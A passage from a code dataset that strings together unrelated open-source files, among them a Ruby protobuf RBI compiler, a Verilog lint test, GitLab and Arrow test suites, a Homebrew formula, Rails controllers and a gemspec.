        end
        klass.create_method("initialize", parameters: parameters, return_type: "void")
      end
    end
  end

  # All loaded protobuf message classes, plus the two generic containers
  # (only when at least one message class exists).
  sig { override.returns(T::Enumerable[Module]) }
  def gather_constants
    marker = Google::Protobuf::MessageExts::ClassMethods
    results = T.cast(ObjectSpace.each_object(marker).to_a, T::Array[Module])
    results.any? ? results + [Google::Protobuf::RepeatedField, Google::Protobuf::Map] : []
  end

  private

  # Declares the given generic type members on `klass`.
  sig { params(klass: RBI::Scope, names: String).void }
  def create_type_members(klass, *names)
    klass.create_extend("T::Generic")
    names.each do |name|
      klass.create_type_member(name)
    end
  end

  # Maps a protobuf field descriptor's scalar/enum/message type onto the
  # corresponding Sorbet type string.
  sig do
    params(
      descriptor: Google::Protobuf::FieldDescriptor
    ).returns(String)
  end
  def type_of(descriptor)
    case descriptor.type
    when :enum
      descriptor.subtype.enummodule.name
    when :message
      descriptor.subtype.msgclass.name
    when :int32, :int64, :uint32, :uint64
      "Integer"
    when :double, :float
      "Float"
    when :bool
      "T::Boolean"
    when :string, :bytes
      "String"
    else
      "T.untyped"
    end
  end

  # Builds the Field record for a descriptor, handling map entries,
  # repeated fields, and plain fields.
  sig { params(descriptor: Google::Protobuf::FieldDescriptor).returns(Field) }
  def field_of(descriptor)
    if descriptor.label == :repeated
      # Here we're going to check if the submsg_name is named according to
      # how Google names map entries.
      # https://github.com/protocolbuffers/protobuf/blob/f82e26/ruby/ext/google/protobuf_c/defs.c#L1963-L1966
      if descriptor.submsg_name.to_s.end_with?("_MapEntry_#{descriptor.name}")
        key = descriptor.subtype.lookup("key")
        value = descriptor.subtype.lookup("value")
        key_type = type_of(key)
        value_type = type_of(value)
        type = "Google::Protobuf::Map[#{key_type}, #{value_type}]"
        # Google::Protobuf::Map.new takes the value class as an extra
        # argument for enum/message values.
        default_args = [key.type.inspect, value.type.inspect]
        default_args << value_type if [:enum, :message].include?(value.type)
        Field.new(
          name: descriptor.name,
          type: type,
          init_type: "T.any(#{type}, T::Hash[#{key_type}, #{value_type}])",
          default: "Google::Protobuf::Map.new(#{default_args.join(", ")})"
        )
      else
        elem_type = type_of(descriptor)
        type = "Google::Protobuf::RepeatedField[#{elem_type}]"
        default_args = [descriptor.type.inspect]
        default_args << elem_type if [:enum, :message].include?(descriptor.type)
        Field.new(
          name: descriptor.name,
          type: type,
          init_type: "T.any(#{type}, T::Array[#{elem_type}])",
          default: "Google::Protobuf::RepeatedField.new(#{default_args.join(", ")})"
        )
      end
    else
      type = type_of(descriptor)
      Field.new(
        name: descriptor.name,
        type: type,
        init_type: type,
        default: "nil"
      )
    end
  end

  # Emits the reader and writer methods for one field on `klass` and
  # returns its Field record (used later for #initialize parameters).
  sig do
    params(
      klass: RBI::Scope,
      desc: Google::Protobuf::FieldDescriptor,
    ).returns(Field)
  end
  def create_descriptor_method(klass, desc)
    field = field_of(desc)
    klass.create_method(
      field.name,
      return_type: field.type
    )
    klass.create_method(
      "#{field.name}=",
      parameters: [create_param("value", type: field.type)],
      return_type: field.type
    )
    field
  end
end
end
end
end
| 31.535545 | 115 | 0.537872 |
21f9ecd200672e8bca804aa5f287ffffa98b8648 | 6,559 | # VL 2014 -- VL Verilog Toolkit, 2014 Edition
# Copyright (C) 2008-2015 Centaur Technology
#
# Contact:
# Centaur Technology Formal Verification Group
# 7600-C N. Capital of Texas Highway, Suite 300, Austin, TX 78731, USA.
# http://www.centtech.com/
#
# License: (An MIT/X11-style license)
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# Original author: Jared Davis <[email protected]>
require_relative '../utils'
outlaw_bad_warnings()
# BOZO whaaat is going on here??
# outlaw_warning_global("VL-PROGRAMMING-ERROR")
# Expect an UNSET warning for wirename in modname.
# It's okay for a wire to be both unset and unused, because some bits may
# be unset while others are unused — but it must never also be flagged
# spurious.
def unset(modname, wirename)
  match_warning(modname, "VL-LUCID-UNSET", wirename)
  %w[VL-LUCID-SPURIOUS].each { |w| outlaw_warning(modname, w, wirename) }
end
# Expect an UNUSED warning for wirename in modname.
# Unset+unused together is legitimate (bitwise mixtures), but an unused
# wire must never also be marked spurious.
def unused(modname, wirename)
  match_warning(modname, "VL-LUCID-UNUSED", wirename)
  %w[VL-LUCID-SPURIOUS].each { |w| outlaw_warning(modname, w, wirename) }
end
# Expect a SPURIOUS warning for wirename in modname, and forbid the
# unset/unused warnings (spurious subsumes both).
def spurious(modname, wirename)
  match_warning(modname, "VL-LUCID-SPURIOUS", wirename)
  %w[VL-LUCID-UNSET VL-LUCID-UNUSED].each do |warning|
    outlaw_warning(modname, warning, wirename)
  end
end
# Expect NO lucid warnings at all for wirename in modname.
def normal(modname, wirename)
  %w[VL-LUCID-SPURIOUS VL-LUCID-UNSET VL-LUCID-UNUSED].each do |warning|
    outlaw_warning(modname, warning, wirename)
  end
end
normal(:"Design Root", "top_normal ")
spurious(:"Design Root", "top_spurious ")
unset(:"Design Root", "top_unset ")
unused(:"Design Root", "top_unused ")
normal(:m0, "w1_normal ")
spurious(:m0, "w1_spurious ")
unset(:m0, "w1_unset ")
unused(:m0, "w1_unused ")
unused(:"Design Root", "Type top_unused_t ")
normal(:"Design Root", "Type top_used_t ")
unused(:"Design Root", "Function top_f_unused ")
normal(:"Design Root", "Function top_f_used ")
normal(:m1, "myout ")
normal(:m2, "l1_normal ")
spurious(:m2, "l1_spurious ")
unset(:m2, "l1_unset ")
unused(:m2, "l1_unused ")
normal(:m3, "delay ")
unset(:m3, "clk ")
spurious(:m3, "r1_spurious ")
unset(:m3, "r1_unset ")
normal(:m3, "r1_normal ")
unused(:m3, "r1_unused ")
normal(:"Design Root", "Type opcode_t ")
unused(:"Design Root", "Type instruction_t ")
normal(:pkg1, "p1_normal ")
unset(:pkg1, "p1_unset ")
unused(:pkg1, "p1_unused ")
spurious(:pkg1, "p1_spurious ")
unset(:pkg1, "pr1_unset ")
unset(:pkg1, "pr2_unset ")
unused(:pkg1, "pr1_unused ")
unused(:pkg1, "pr2_unused ")
normal(:pkg1, "pr1_normal ")
normal(:pkg1, "pr2_normal ")
normal(:pkg1, "Function pfn_used ")
unused(:pkg1, "Function pfn_unused ")
normal(:m4, "u1 ")
normal(:m4, "u2 ")
unused(:"Design Root", "Function noreturn ")
unused(:"Design Root", "nr_unused ")
unset(:"Design Root", "noreturn ")
normal(:m5, "width ")
unused(:m5, "m5_unused ")
unset(:m5, "m5_unset ")
unset(:m5, "doublebad ")
unused(:m5, "doublebad ")
normal(:m6, "width ")
normal(:m6, "xout ")
normal(:m6, "xin ")
unset(:m6, "foo ")
unused(:m7, "unused1 ")
unused(:m7, "unused2 ")
unused(:m7, "unused3 ")
unset(:m7, "unset1 ")
unset(:m7, "unset2 ")
unset(:m7, "unset3 ")
normal(:m8sub, "outtrans ");
normal(:m8sub, "intrans ");
normal(:m8, "normal_trans ")
unset(:m8, "unset_trans ")
unused(:m8, "unused_trans ")
spurious(:m8, "spurious_trans ")
unused(:m8, "xx0 ")
unused(:m8, "xx1 ")
unused(:m8, "subout ");
unset(:m8, "subin ");
normal(:MemReq, "w1_normal ")
unset(:MemReq, "w1_unset ")
unused(:MemReq, "w1_unused ")
unset(:MemReq, "w1_partial_unset ")
unused(:MemReq, "w1_partial_unused ")
spurious(:MemReq, "w1_spurious")
normal(:m9write, "foo ")
normal(:m9read, "foo ")
unused(:m9read, "blah ")
normal(:m9writewrap, "foo ")
normal(:m9readwrap, "foo ")
normal(:m9, "mr_used1 ")
normal(:m9, "mr_used2 ")
spurious(:m9, "mr_spurious ")
spurious(:mh1, "w1_spurious ")
normal(:mh1, "w1_normal ")
unused(:mh1, "w1_unused ")
unset(:mh1, "w1_unset ")
normal(:idx1, "normal1 ")
normal(:idx1, "normal2 ")
normal(:idx1, "normal3 ")
normal(:idx1, "a1 ")
normal(:idx1, "a2 ")
unused(:idx1, "unused1 ")
unused(:idx1, "unused2 ")
unused(:idx1, "unused3 ")
spurious(:dsInterface, "dsi_spurious")
normal(:dsInterface, "dsi_normal")
unused(:dsInterface, "dsi_unused")
unset(:dsInterface, "dsi_unset")
normal(:dotstar, "out1 ")
normal(:dotstar, "out2 ")
normal(:dotstar, "in1 ")
normal(:dotstar, "in2 ")
normal(:dotstar, "dsi ")
unused(:dotstarwrap, "out1 ")
unused(:dotstarwrap, "out2 ")
unset(:dotstarwrap, "in1 ")
unset(:dotstarwrap, "in2 ")
normal(:dotstar, "dsi ")
spurious(:ImPort, "dataSpurious ")
spurious(:ImPort, "reqMain ")
unused(:ImPort, "dataVld ")
unused(:ImPort, "dataMain ")
unset(:ImPort, "reqVld ")
normal(:imserve, "w1_normal ")
spurious(:imserve, "w1_spurious ")
unset(:imserve, "w1_unset ")
unused(:imserve, "w1_unused ")
normal(:imserve, "foo ")
normal(:imserve, "bar ")
normal(:imservewrap, "foo ")
normal(:imservewrap, "bar ")
normal(:imservewrap, "port1 ")
normal(:imservewrap, "port2 ")
unset(:imsim, "foo ")
unused(:imsim, "bar ")
normal(:imsim, "port1 ")
normal(:imsim, "port2 ")
# I know these don't work yet
#normal(:mg1, "p1_used ")
#normal(:mg1, "w1_normal ")
unset(:useprim, "w1_unset ")
unused(:useprim, "w1_unused ")
spurious(:useprim, "w1_spurious ")
unused(:trickyscope, "counter_unused ")
unset(:minuscolon, "normal2")
unused(:minuscolon, "normal1")
test_passed()
| 26.554656 | 79 | 0.700412 |
b99c02351d0c2514b50fdd58eeff28cf0984bebe | 1,403 | # frozen_string_literal: true
require 'spec_helper'
# Verifies project-mention reference gathering honors project visibility.
describe Banzai::ReferenceParser::MentionedProjectParser do
  include ReferenceParserHelpers

  let(:group) { create(:group, :private) }
  let(:user) { create(:user) }
  let(:new_user) { create(:user) }
  let(:project) { create(:project, group: group, creator: user) }
  let(:link) { empty_html_link }

  # Render in the context of new_user, who has no access by default.
  subject { described_class.new(Banzai::RenderContext.new(project, new_user)) }

  describe '#gather_references' do
    context 'when the link has a data-project attribute' do
      context 'using an existing project ID where user does not have access' do
        it 'returns empty Array' do
          link['data-project'] = project.id.to_s

          # NOTE(review): trailing argument appears to be the count of
          # filtered-out references — confirm against the helper.
          expect_gathered_references(subject.gather_references([link]), [], 1)
        end
      end

      context 'using an existing project ID' do
        before do
          link['data-project'] = project.id.to_s
          # Grant access so the reference becomes visible.
          project.add_developer(new_user)
        end

        it 'returns an Array of referenced projects' do
          expect_gathered_references(subject.gather_references([link]), [project], 0)
        end
      end

      context 'using a non-existing project ID' do
        it 'returns an empty Array' do
          link['data-project'] = 'inexisting-project-id'

          expect_gathered_references(subject.gather_references([link]), [], 1)
        end
      end
    end
  end
end
| 29.851064 | 85 | 0.659301 |
f7fb59642a894e1f47fcd83a354b60161c873fb8 | 1,146 | class Urweb < Formula
desc "Ur/Web programming language"
homepage "http://www.impredicative.com/ur/"
url "http://www.impredicative.com/ur/urweb-20170105.tgz"
sha256 "2ad3aea2c4851c9b18f752d38c7127af8293fbbbbdb3dd06b73a4603fe399b67"

# Pre-built binary bottles for the supported macOS releases.
bottle do
  sha256 "5f406928ad3e00bc835b7b04e29a9a3edad0e727ebc5e16c650a72bed19d8766" => :sierra
  sha256 "f98d2b47c5736ef2a2e014933e16d09f9a9a32d4668fd5f022032510df6494e3" => :el_capitan
  sha256 "116d3adc41454c84331d646094bc73857f9ba8020cce7891b67d5d03d458da7d" => :yosemite
end

# Build-time toolchain only.
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
depends_on "mlton" => :build
# Runtime libraries.
depends_on "openssl"
depends_on "gmp"
# Optional database backends.
depends_on :postgresql => :optional
depends_on :mysql => :optional
def install
args = %W[
--disable-debug
--disable-dependency-tracking
--disable-silent-rules
--with-openssl=#{Formula["openssl"].opt_prefix}
--prefix=#{prefix}
SITELISP=$prefix/share/emacs/site-lisp/urweb
]
system "./configure", *args
system "make", "install"
end
test do
system "#{bin}/urweb"
end
end
| 28.65 | 92 | 0.719895 |
fffd71d69f5a53aa6b1cc690685cbfa2e6f6208b | 979 | # frozen_string_literal: true
module LabelPrintingApp
  # Resolves a label template's variable rules against an instance's values
  # and asks the MesServer to render a preview image of the result.
  class PreviewLabel < BaseService
    include LabelContent

    attr_reader :label_name, :instance

    def initialize(label_name, instance, supporting_data = {})
      @label_name = label_name
      @instance = instance
      @supporting_data = supporting_data
      raise ArgumentError if @label_name.nil?
    end

    # Returns a success response wrapping the preview image, or a failed
    # response when the framework reports an error.
    def call
      messerver_preview(values_from(fields_for_label))
    rescue Crossbeams::FrameworkError => e
      failed_response(e.message)
    end

    private

    # Requests the rendered preview from the MesServer; passes repo failures
    # straight through to the caller.
    def messerver_preview(vars)
      res = MesserverApp::MesserverRepo.new.preview_published_label(label_name, vars)
      return res unless res.success

      success_response('ok', OpenStruct.new(fname: 'preview_lbl', body: res.instance))
    end
  end
end
| 27.194444 | 102 | 0.716037 |
0896142d2e067ee8f0e9a22d2da60271e009dbad | 140 | require 'test_helper'
class BigosMenuBoxTest < ActiveSupport::TestCase
  # Smoke test: the engine's namespace constant is loaded.
  test "truth" do
    assert_kind_of Module, BigosMenuBox
  end
end
| 17.5 | 48 | 0.778571 |
1df0623bedb70ffdd1234dc1c1c05c353ea6d253 | 1,726 | require 'pathname'
module JSON
  # Wraps a parsed JSON schema document together with the URI it was loaded
  # from and the validator (schema-draft implementation) used to validate
  # instances against it.
  class Schema
    attr_accessor :schema, :uri, :validator

    # schema           - Hash form of the schema document.
    # uri              - URI the schema was loaded from; overridden by the
    #                    schema's own "id" attribute when present.
    # parent_validator - validator inherited from an enclosing schema, used
    #                    when this schema declares no "$schema" itself.
    def initialize(schema, uri, parent_validator = nil)
      @schema = schema
      @uri = uri

      # If there is an ID on this schema, use it to generate the URI
      if @schema['id'] && @schema['id'].kind_of?(String)
        temp_uri = JSON::Util::URI.parse(@schema['id'])
        if temp_uri.relative?
          temp_uri = uri.join(temp_uri)
        end
        @uri = temp_uri
      end
      @uri = JSON::Util::URI.strip_fragment(@uri)

      # If there is a $schema on this schema, use it to determine which validator to use
      if @schema['$schema']
        @validator = JSON::Validator.validator_for(@schema['$schema'])
      elsif parent_validator
        @validator = parent_validator
      else
        @validator = JSON::Validator.default_validator
      end
    end

    # Validates +data+ against this schema using the resolved validator.
    def validate(data, fragments, processor, options = {})
      @validator.validate(self, data, fragments, processor, options)
    end

    # Recursively converts Hash keys and Symbol values to Strings, leaving
    # every other value untouched. (Fix: reuse the destructured +value+
    # instead of re-fetching schema[key], and build the result with
    # each_with_object rather than an intermediate Hash[...] construction.)
    def self.stringify(schema)
      case schema
      when Hash
        schema.each_with_object({}) do |(key, value), stringified|
          stringified[key.to_s] = stringify(value)
        end
      when Array
        schema.map { |schema_item| stringify(schema_item) }
      when Symbol
        schema.to_s
      else
        schema
      end
    end

    # @return [JSON::Schema] a new schema matching an array whose items all match this schema.
    def to_array_schema
      array_schema = { 'type' => 'array', 'items' => schema }
      array_schema['$schema'] = schema['$schema'] unless schema['$schema'].nil?
      JSON::Schema.new(array_schema, uri, validator)
    end

    def to_s
      @schema.to_json
    end
  end
end
| 27.396825 | 94 | 0.615875 |
ab23f29387a604c76805fb361f82f35843743a61 | 1,793 | # require_dependency "pack/application_controller"
module Pack
  # Admin CRUD for Package records plus a JSON finder endpoint used by
  # incremental-search widgets.
  class Admin::PackagesController < Admin::ApplicationController
    # GET /admin/packages
    # HTML: PackSearch-driven listing; JSON: paginated finder results with a
    # total count for the widget.
    def index
      respond_to do |format|
        format.html{
          @q_form = OpenStruct.new(q_param)
          search = PackSearch.new(@q_form.to_h, 'packages')
          @packages = search.get_results(nil)
          without_pagination(:packages)
        } # index.html.erb
        format.json do
          @packages = Package.finder(params[:q])
          render json: { records: @packages.page(params[:page]).per(params[:per]), total: @packages.count }
        end
      end
    end

    # GET /admin/packages/:id — package plus its paginated versions.
    def show
      @package = Package.find(params[:id])
      @versions = @package.versions.page(params[:page]).per(@per).includes(clustervers: :core_cluster)
    end

    def new
      @package = Package.new
    end

    def create
      @package = Package.new(package_params)
      if @package.save
        redirect_to admin_package_path(@package.id)
      else
        render :new
      end
    end

    def edit
      @package = Package.find(params[:id])
    end

    # Uses optimistic locking: :lock_version is whitelisted in package_params.
    def update
      @package = Package.find(params[:id])
      if @package.update(package_params)
        redirect_to admin_package_path(@package.id)
      else
        render :edit
      end
    end

    def destroy
      @package = Package.find(params[:id])
      @package.destroy
      redirect_to admin_packages_path
    end

    private

    # Strong parameters; locale_columns expands per-locale name/description
    # attributes.
    def package_params
      params.require(:package)
            .permit(*Package.locale_columns(:description, :name),
                    :deleted, :lock_version, :accesses_to_package)
    end

    def search_params
      params.require(:search).permit(:deleted)
    end

    # Default search: only packages active on clustervers.
    def q_param
      params[:q] || { clustervers_active_in: '1' }
    end
  end
end
| 23.906667 | 107 | 0.615728 |
6af378b27f84544f50723663634a274833d6d0d9 | 56 | require 'spec_helper'
# Placeholder spec — no examples for Tradier::Balance have been written yet.
describe Tradier::Balance do
end
| 11.2 | 28 | 0.803571 |
6a7c42b3abcea87e3ab80e4f929a9f79c0c78a16 | 910 | module Spree
module Api
module V2
module Storefront
module Account
class CreditCardsController < ::Spree::Api::V2::ResourceController
before_action :require_spree_current_user
private
def model_class
Spree::CreditCard
end
def collection_serializer
Spree::Api::Dependencies.storefront_credit_card_serializer.constantize
end
def collection_finder
Spree::Api::Dependencies.storefront_credit_card_finder.constantize
end
def resource_serializer
Spree::Api::Dependencies.storefront_credit_card_serializer.constantize
end
def resource_finder
Spree::Api::Dependencies.storefront_credit_card_finder.constantize
end
end
end
end
end
end
end
| 25.277778 | 84 | 0.605495 |
4ae067763d8f06b5c4a30bd6963f4601d9f435fb | 1,356 | # Copyright (c) 2018-2019 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: MIT
# DO NOT MODIFY. THIS CODE IS GENERATED. CHANGES WILL BE OVERWRITTEN.

# vapi - vAPI is an extensible API Platform for modelling and delivering APIs/SDKs/CLIs.

require 'spec_helper'
require 'json'
require 'date'

# Unit tests for VSphereAutomation::VAPI::VapiMetadataCliCommandOutputInfo
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'VapiMetadataCliCommandOutputInfo' do
  before do
    # run before each test: build a fresh, empty model instance
    @instance = VSphereAutomation::VAPI::VapiMetadataCliCommandOutputInfo.new
  end

  after do
    # run after each test
  end

  describe 'test an instance of VapiMetadataCliCommandOutputInfo' do
    it 'should create an instance of VapiMetadataCliCommandOutputInfo' do
      expect(@instance).to be_instance_of(VSphereAutomation::VAPI::VapiMetadataCliCommandOutputInfo)
    end
  end

  # Generated attribute stubs below are intentionally empty pending real
  # assertions.
  describe 'test attribute "structure_id"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end

  describe 'test attribute "output_fields"' do
    it 'should work' do
      # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
    end
  end
end
| 30.818182 | 102 | 0.758112 |
bb70fb52a0473a8d1143332a749fac2621d498bd | 317 | cask "fantasy-grounds" do
version :latest
sha256 :no_check
url "https://www.fantasygrounds.com/filelibrary/FantasyGrounds.dmg"
name "Fantasy Grounds"
homepage "https://www.fantasygrounds.com/home/home.php"
app "Fantasy Grounds.app"
zap trash: "~/Library/Saved Application State/Fantasy Grounds*"
end
| 24.384615 | 69 | 0.750789 |
aba56e11a20be0c57e819a95fb2c92421762f307 | 421 | ENV["RAILS_ENV"] ||= 'test'
# Minitest spec-style setup with reporter output.
require 'minitest/spec'
require 'minitest/autorun'
require "minitest/reporters"
MiniTest::Reporters.use!
require 'debugger'
require './lib/readouts'

# Load every spec support file and the whole lib tree. APP_ROOT is expected
# to be defined before this helper is required.
Dir[File.join(APP_ROOT,"spec/support/**/*.rb")].each {|f| require f }
Dir.glob(File.join(APP_ROOT, 'lib/**/*.rb')).each {|f| require f}
include Readouts

require 'mustard'
# other niceties
Mustard.matcher(:be_true) { instance_of?TrueClass}
| 23.388889 | 69 | 0.72209 |
e819316b5a61e5a36245817bb4a124358a0d3eeb | 100 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
# Pull in the game implementation from lib/ relative to this file.
require_relative "../lib/tic_tac_toe.rb"
| 33.333333 | 58 | 0.74 |
084d3f794eb5cc10bcd3380192a268f10eb42592 | 1,657 | # -*- encoding: utf-8 -*-
# rubocop:disable all
$LOAD_PATH.push File.expand_path("../lib", __FILE__)

# Author and gem name are held in locals so the interpolations below stay in
# sync if the gem is renamed.
author_name = "PikachuEXE"
gem_name = "active_record_tweaks"

require "#{gem_name}/version"

Gem::Specification.new do |s|
  s.platform    = Gem::Platform::RUBY
  s.name        = gem_name
  s.version     = ActiveRecordTweaks::VERSION
  s.summary     = "Some Tweaks for ActiveRecord"
  s.description = <<-DOC
    ActiveRecord is great, but could be better. Here are some tweaks for it.
  DOC
  s.license     = "MIT"

  s.authors     = [author_name]
  s.email       = ["[email protected]"]
  s.homepage    = "http://github.com/#{author_name}/#{gem_name}"

  # File lists come straight from git so nothing needs manual maintenance.
  s.files         = `git ls-files`.split("\n")
  s.test_files    = `git ls-files -- {test,spec,features}/*`.split("\n")
  s.executables   = `git ls-files -- bin/*`.split("\n").map { |f| File.basename(f) }
  s.require_paths = ["lib"]

  # Runtime dependency: tested against Rails 5.2 through 6.x.
  s.add_dependency "activerecord", ">= 5.2.0", "< 7.0.0"

  # Development-only dependencies.
  s.add_development_dependency "bundler", ">= 1.0.0"
  s.add_development_dependency "rake", ">= 10.0", "<= 14.0"
  s.add_development_dependency "appraisal", "~> 2.0"
  s.add_development_dependency "rspec", "~> 3.0"
  s.add_development_dependency "rspec-its", "~> 1.0"
  s.add_development_dependency "sqlite3", ">= 1.3"
  s.add_development_dependency "database_cleaner", ">= 1.0"
  s.add_development_dependency "simplecov", ">= 0.21"
  s.add_development_dependency "simplecov-lcov", ">= 0.8"
  s.add_development_dependency "gem-release", ">= 0.7"
  s.add_development_dependency "timecop", ">= 0.7.1"

  s.required_ruby_version = ">= 2.4.0"

  s.required_rubygems_version = ">= 1.4.0"
end
| 34.520833 | 84 | 0.648763 |
115656b7d761ff64b7df318f38bb2d7c4d8d7112 | 7,730 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Shared examples exercising #values on dictionary-encoded Arrow arrays.
# Including classes provide #build, which wraps a plain array in the
# dictionary-encoded container under test; each example then asserts that
# #values round-trips the original Ruby values (nils included).
module ValuesDictionaryArrayTests
  def test_null
    target = build(Arrow::NullArray.new(4))
    assert_equal([nil] * 4, target.values)
  end

  def test_boolean
    values = [true, nil, false]
    target = build(Arrow::BooleanArray.new(values))
    assert_equal(values, target.values)
  end

  # The integer examples below use each type's minimum and maximum
  # representable values as boundary cases.
  def test_int8
    values = [
      -(2 ** 7),
      nil,
      (2 ** 7) - 1,
    ]
    target = build(Arrow::Int8Array.new(values))
    assert_equal(values, target.values)
  end

  def test_uint8
    values = [
      0,
      nil,
      (2 ** 8) - 1,
    ]
    target = build(Arrow::UInt8Array.new(values))
    assert_equal(values, target.values)
  end

  def test_int16
    values = [
      -(2 ** 15),
      nil,
      (2 ** 15) - 1,
    ]
    target = build(Arrow::Int16Array.new(values))
    assert_equal(values, target.values)
  end

  def test_uint16
    values = [
      0,
      nil,
      (2 ** 16) - 1,
    ]
    target = build(Arrow::UInt16Array.new(values))
    assert_equal(values, target.values)
  end

  def test_int32
    values = [
      -(2 ** 31),
      nil,
      (2 ** 31) - 1,
    ]
    target = build(Arrow::Int32Array.new(values))
    assert_equal(values, target.values)
  end

  def test_uint32
    values = [
      0,
      nil,
      (2 ** 32) - 1,
    ]
    target = build(Arrow::UInt32Array.new(values))
    assert_equal(values, target.values)
  end

  def test_int64
    values = [
      -(2 ** 63),
      nil,
      (2 ** 63) - 1,
    ]
    target = build(Arrow::Int64Array.new(values))
    assert_equal(values, target.values)
  end

  def test_uint64
    values = [
      0,
      nil,
      (2 ** 64) - 1,
    ]
    target = build(Arrow::UInt64Array.new(values))
    assert_equal(values, target.values)
  end

  def test_float
    values = [
      -1.0,
      nil,
      1.0,
    ]
    target = build(Arrow::FloatArray.new(values))
    assert_equal(values, target.values)
  end

  def test_double
    values = [
      -1.0,
      nil,
      1.0,
    ]
    target = build(Arrow::DoubleArray.new(values))
    assert_equal(values, target.values)
  end

  # Binary values are raw bytes (ASCII-8BIT strings).
  def test_binary
    values = [
      "\x00".b,
      nil,
      "\xff".b,
    ]
    target = build(Arrow::BinaryArray.new(values))
    assert_equal(values, target.values)
  end

  def test_string
    values = [
      "Ruby",
      nil,
      "\u3042", # U+3042 HIRAGANA LETTER A
    ]
    target = build(Arrow::StringArray.new(values))
    assert_equal(values, target.values)
  end

  # Temporal examples: Date for date32, DateTime for date64, Time for
  # timestamps at each supported precision.
  def test_date32
    values = [
      Date.new(1960, 1, 1),
      nil,
      Date.new(2017, 8, 23),
    ]
    target = build(Arrow::Date32Array.new(values))
    assert_equal(values, target.values)
  end

  def test_date64
    values = [
      DateTime.new(1960, 1, 1, 2, 9, 30),
      nil,
      DateTime.new(2017, 8, 23, 14, 57, 2),
    ]
    target = build(Arrow::Date64Array.new(values))
    assert_equal(values, target.values)
  end

  def test_timestamp_second
    values = [
      Time.parse("1960-01-01T02:09:30Z"),
      nil,
      Time.parse("2017-08-23T14:57:02Z"),
    ]
    target = build(Arrow::TimestampArray.new(:second, values))
    assert_equal(values, target.values)
  end

  def test_timestamp_milli
    values = [
      Time.parse("1960-01-01T02:09:30.123Z"),
      nil,
      Time.parse("2017-08-23T14:57:02.987Z"),
    ]
    target = build(Arrow::TimestampArray.new(:milli, values))
    assert_equal(values, target.values)
  end

  def test_timestamp_micro
    values = [
      Time.parse("1960-01-01T02:09:30.123456Z"),
      nil,
      Time.parse("2017-08-23T14:57:02.987654Z"),
    ]
    target = build(Arrow::TimestampArray.new(:micro, values))
    assert_equal(values, target.values)
  end

  def test_timestamp_nano
    values = [
      Time.parse("1960-01-01T02:09:30.123456789Z"),
      nil,
      Time.parse("2017-08-23T14:57:02.987654321Z"),
    ]
    target = build(Arrow::TimestampArray.new(:nano, values))
    assert_equal(values, target.values)
  end

  # Time-of-day examples: Arrow::Time wraps a unit plus a count of units
  # since midnight.
  def test_time32_second
    unit = Arrow::TimeUnit::SECOND
    values = [
      Arrow::Time.new(unit, 60 * 10), # 00:10:00
      nil,
      Arrow::Time.new(unit, 60 * 60 * 2 + 9), # 02:00:09
    ]
    target = build(Arrow::Time32Array.new(unit, values))
    assert_equal(values, target.values)
  end

  def test_time32_milli
    unit = Arrow::TimeUnit::MILLI
    values = [
      Arrow::Time.new(unit, (60 * 10) * 1000 + 123), # 00:10:00.123
      nil,
      Arrow::Time.new(unit, (60 * 60 * 2 + 9) * 1000 + 987), # 02:00:09.987
    ]
    target = build(Arrow::Time32Array.new(unit, values))
    assert_equal(values, target.values)
  end

  def test_time64_micro
    unit = Arrow::TimeUnit::MICRO
    values = [
      # 00:10:00.123456
      Arrow::Time.new(unit, (60 * 10) * 1_000_000 + 123_456),
      nil,
      # 02:00:09.987654
      Arrow::Time.new(unit, (60 * 60 * 2 + 9) * 1_000_000 + 987_654),
    ]
    target = build(Arrow::Time64Array.new(unit, values))
    assert_equal(values, target.values)
  end

  def test_time64_nano
    unit = Arrow::TimeUnit::NANO
    values = [
      # 00:10:00.123456789
      Arrow::Time.new(unit, (60 * 10) * 1_000_000_000 + 123_456_789),
      nil,
      # 02:00:09.987654321
      Arrow::Time.new(unit, (60 * 60 * 2 + 9) * 1_000_000_000 + 987_654_321),
    ]
    target = build(Arrow::Time64Array.new(unit, values))
    assert_equal(values, target.values)
  end

  # Decimal examples use BigDecimal with an explicit (precision, scale).
  def test_decimal128
    values = [
      BigDecimal("92.92"),
      nil,
      BigDecimal("29.29"),
    ]
    data_type = Arrow::Decimal128DataType.new(8, 2)
    target = build(Arrow::Decimal128Array.new(data_type, values))
    assert_equal(values, target.values)
  end

  def test_decimal256
    values = [
      BigDecimal("92.92"),
      nil,
      BigDecimal("29.29"),
    ]
    data_type = Arrow::Decimal256DataType.new(38, 2)
    target = build(Arrow::Decimal256Array.new(data_type, values))
    assert_equal(values, target.values)
  end

  # Interval examples: months as plain integers; day-time and
  # month-day-nano intervals as hashes of their components.
